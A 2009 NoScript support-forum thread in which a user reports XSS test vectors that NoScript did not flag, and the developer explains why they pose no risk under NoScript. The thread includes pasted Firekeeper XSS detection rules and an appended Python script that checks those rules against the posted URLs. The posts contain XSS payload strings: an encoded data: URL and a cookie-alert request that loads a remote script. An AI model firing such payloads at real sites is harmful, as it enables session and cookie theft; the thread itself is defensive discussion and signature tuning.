Hi Giorgio Maone,
The following attack vector: data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
was not being detected by NoScript when tested here: hxxp://bypass.xssing.com/testing.php?vector=data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
luntrus
XSS exploit not detected by NoScript
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090322 Minefield/3.6a1pre
- Ambassador
- Posts: 1586
- Joined: Fri Mar 20, 2009 4:47 am
- Location: Colorado, USA
Re: XSS exploit not detected by NoScript
Thank you for posting this over here, luntrus. Was this one of the exploits tagged by Firekeeper?
http://forum.avast.com/index.php?topic= ... #msg364676
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
- Giorgio Maone
- Site Admin
- Posts: 9454
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
Re: XSS exploit not detected by NoScript
As I already explained elsewhere, this "exploit" is irrelevant to NoScript.
How exactly is it supposed to trigger while NoScript is enabled?
data: URLs are blocked by NoScript on untrusted sites, and they inherit the same principal as the hosting page, so they're not cross-site.
So, can you show me a plausible scenario in which this "exploit" can be successful with NoScript?
On a side note, where did you take it from to test? It's the second time I see it wrongly reported as "XSS bypassing NoScript"...
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)
Re: XSS exploit not detected by NoScript
Hi Giorgio Maone,
I believe you when you say that when script is disabled from running, then no exploit can be executed.
That is simple logic, and everybody can understand that.
The tests are to be found here: http://www.xssing.com/index.php?x=1 (and subsequent pages)
Normally I get a Firekeeper alert like for instance this one:
=== Triggered rule ===
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22http://www.site.com/XSS.js%22%3E%3C/script%3E
or Netcraft warns me here:
The page you are trying to visit is using Cross-Site Scripting (XSS).
This is a technique commonly used in phishing attacks.
URL: http://bypass.xssing.com/testing.php%3fvector=%25...ion(alert())%253E
If this is a mistake, please report it using
'Report Incorrectly Blocked URL' in the Netcraft Menu.
Do you still want to go there?
But I do not get a warning from NoScript; is this because I have RequestPolicy also active on the test page?
luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre
- Giorgio Maone
- Site Admin
- Posts: 9454
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
Re: XSS exploit not detected by NoScript
luntrus wrote: But I do not get a warning from NoScript; is this because I have RequestPolicy also active on the test page?
If you don't get the warning for any of the PoCs there, it means that you don't have bypass.xssing.com in your whitelist: if there's no scripting, there's no cross-site scripting either.
If even after whitelisting bypass.xssing.com some PoCs don't trigger the warning, it just means that the PoC as it is cannot work in Firefox, either because it's not compatible with Mozilla browsers (e.g. attacks based on proprietary Microsoft extensions, such as CSS expressions), or it is not correctly implemented (the 1st data: "PoC" is just flawed, it couldn't run on any browser as it is), or some secondary NoScript protection blocks its execution independently from XSS.
In other words, even though they are presented as "XSS exploits", those which don't trigger NoScript's warnings can be considered false positives if they do in FireKeeper. This is understandable, since FireKeeper uses generic hardcoded rules, a blacklist which is not specifically tailored to Firefox and in fact contains Microsoft-specific signatures for exploits which work on IE but mean nothing to Firefox.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)
Re: XSS exploit not detected by NoScript
Hi Giorgio Maone,
That is all understandable and quite reassuring, so the protection of NoScript is completely foolproof in these respects, and having Firekeeper there is just educational, so that it will keep the browser user alert to what rules are eventually triggered.
I think it is never a bad thing for the security-savvy user to be aware of what is going on in the browser. I keep an eye on the error console and if something crops up I will report it here, of course.
The Firekeeper rules against XSS exploits are as follows:
#Rules to detect cross site scripting attacks
####Created by Thomas Kilgore
# javascript: uri schemes in GET requests
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"mocha:"; nocase; msg:"mocha: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"livescript:"; nocase; msg:"livescript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
# normalish html tags using %3C and %3E in GET requests
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CIMG"; nocase; msg:"<img> tags GET request cross site scripting attempt"; url_re:"/%3Cimg.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"malformed <iframe< tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3C/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbody"; nocase; msg:"<body> tags GET request cross site scripting attempt"; url_re:"/%3Cbody.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CINPUT"; nocase; msg:"<input> tags GET request cross site scripting attempt"; url_re:"/%3CINPUT.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBGSOUND"; nocase; msg:"<bgsound> tags GET request cross site scripting attempt"; url_re:"/%3CBGSOUND.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clayer"; nocase; msg:"<layer> tags GET request cross site scripting attempt"; url_re:"/%3Clayer.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clink"; nocase; msg:"<link> tags GET request cross site scripting attempt"; url_re:"/%3Clink.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cstyle"; nocase; msg:"<style> tags GET request cross site scripting attempt"; url_re:"/%3Cstyle.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cmeta"; nocase; msg:"<meta> tags GET request cross site scripting attempt"; url_re:"/%3Cmeta.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cframe"; nocase; msg:"<frame> tags GET request cross site scripting attempt"; url_re:"/%3Cframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctable"; nocase; msg:"<table> tags GET request cross site scripting attempt"; url_re:"/%3Ctable.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cdiv"; nocase; msg:"<div> tags GET request cross site scripting attempt"; url_re:"/%3Cdiv.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctd"; nocase; msg:"<td> tags GET request cross site scripting attempt"; url_re:"/%3Ctd.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ca"; nocase; msg:"<a> tags GET request cross site scripting attempt"; url_re:"/%3Ca.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbase"; nocase; msg:"<base> tags GET request cross site scripting attempt"; url_re:"/%3Cbase.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cobject"; nocase; msg:"<object> tags GET request cross site scripting attempt"; url_re:"/%3Cobject.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Capplet"; nocase; msg:"<applet> tags GET request cross site scripting attempt"; url_re:"/%3Capplet.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cembed"; nocase; msg:"<embed> tags GET request cross site scripting attempt"; url_re:"/%3Cembed.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cxml"; nocase; msg:"<xml> tags GET request cross site scripting attempt"; url_re:"/%3Cxml.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cspan"; nocase; msg:"<span> tags GET request cross site scripting attempt"; url_re:"/%3Cspan.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Chtml"; nocase; msg:"<html> tags GET request cross site scripting attempt"; url_re:"/%3Chtml*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ct:set"; nocase; msg:"<t:set> tags GET request cross site scripting attempt"; url_re:"/%3Ct:set*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
# suspicious HTML-looking input.
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"%2F"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %2F. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"'"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and '. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)
####
Why is there not a specific one just for Firefox?
Furthermore, many, many thanks for your detailed explanation of the facts,
luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre
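To make concrete why these rules are generic URL signatures, here is an added example (not code from the thread, from Firekeeper or from NoScript) that evaluates a constructed subset of the quoted url_content/url_re rules against the two request URLs posted above. It shows the <br> rule firing on the request Firekeeper flagged, and no rule firing on the base64 data: vector, which the signatures never decode.

```python
import re

# Constructed subset of the Firekeeper XSS rules quoted in the thread (references dropped).
RULES = r'''
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt";)
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i";)
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i";)
alert(url_content:"%3CBGSOUND"; nocase; msg:"<bgsound> tags GET request cross site scripting attempt"; url_re:"/%3CBGSOUND.*%3E/i";)
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22.";)
'''

def parse_rule(line):
    """Turn one alert(...) line into a dict: every url_content needle must occur,
    the optional url_re must match, and 'nocase' makes url_content case-insensitive."""
    body = line[line.index("(") + 1:line.rindex(")")]
    rule = {"url_content": [], "url_re": None, "msg": "",
            "nocase": re.search(r";\s*nocase\s*;", body) is not None}
    for key, value in re.findall(r'(\w+):"([^"]*)"', body):
        if key == "url_content":
            rule["url_content"].append(value)
        elif key == "url_re":                      # value looks like /pattern/flags
            m = re.fullmatch(r"/(.*)/([a-z]*)", value)
            rule["url_re"] = re.compile(m.group(1), re.I if "i" in m.group(2) else 0)
        elif key == "msg":
            rule["msg"] = value
    return rule

def rule_matches(rule, url):
    if not rule["url_content"]:                    # header/body rules never fire on a URL
        return False
    hay = url.lower() if rule["nocase"] else url
    needles = [n.lower() if rule["nocase"] else n for n in rule["url_content"]]
    if not all(n in hay for n in needles):
        return False
    return rule["url_re"] is None or rule["url_re"].search(url) is not None

def triggered(url):
    """Return the msg of every rule the request URL trips, in rule order."""
    rules = [parse_rule(l) for l in RULES.strip().splitlines()]
    return [r["msg"] for r in rules if rule_matches(r, url)]

# The two request URLs from the thread: the one Firekeeper flagged and the data: vector.
FLAGGED_URL = ("http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3E"
               "alert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22"
               "http://www.site.com/XSS.js%22%3E%3C/script%3E")
DATA_URL = ("http://bypass.xssing.com/testing.php?vector=data:text/html;charset=utf-7;"
            "base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=")

if __name__ == "__main__":
    for u in (FLAGGED_URL, DATA_URL):
        print(u[:60], "->", triggered(u) or "no rule fired")
```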
- Giorgio Maone
- Site Admin
- Posts: 9454
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
Re: XSS exploit not detected by NoScript
luntrus wrote: Why is there not a specific one just for Firefox?
Because NoScript exists for Firefox.
BTW, just at a glance from the rules you pasted, BGSOUND is not supported by Firefox, and the last rule clearly reveals some of these rules are IE-specific:
# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)